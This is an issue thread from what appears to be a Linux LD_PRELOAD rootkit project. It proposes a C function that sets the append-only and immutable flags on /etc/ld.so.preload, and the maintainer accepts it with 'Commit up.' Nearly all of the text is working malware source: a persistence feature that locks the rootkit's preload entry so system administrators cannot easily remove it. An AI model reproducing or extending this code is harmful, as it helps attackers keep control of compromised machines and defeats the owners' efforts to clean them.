### ISSUE TITLE
Suggest: Add append,immute attributes to /etc/ld.so.preload

### ISSUE THREAD

**Issue by wzctggzl** [kcaaj/bdvl#22]
short int resident_ia_fpath(const char *path, short int apply) {
 int fp = (long)call(COPEN, path, O_NONBLOCK);
 int ret, chk;

 if(fp < 0)
  return 0;

 off_t fpendlen = lseek(fp, 0L, SEEK_END);
 if((fpendlen < 1) && apply)
  return 0;

 if(ioctl(fp, FS_IOC_GETFLAGS, &ret) < 0) {
  close(fp);
  return 0;
 }

 chk = ret;
 if(apply)
  ret |= (FS_APPEND_FL|FS_IMMUTABLE_FL);
 if(!apply)
  ret &=~(FS_APPEND_FL|FS_IMMUTABLE_FL);

 if(ret != chk)
  if(ioctl(fp, FS_IOC_SETFLAGS, &ret) < 0) {
   close(fp);
   return 0;
  }

 if(close(fp) == 0)
  return 1;

 return 0;
}

**Comment by kcaaj** [comment]
Commit up.
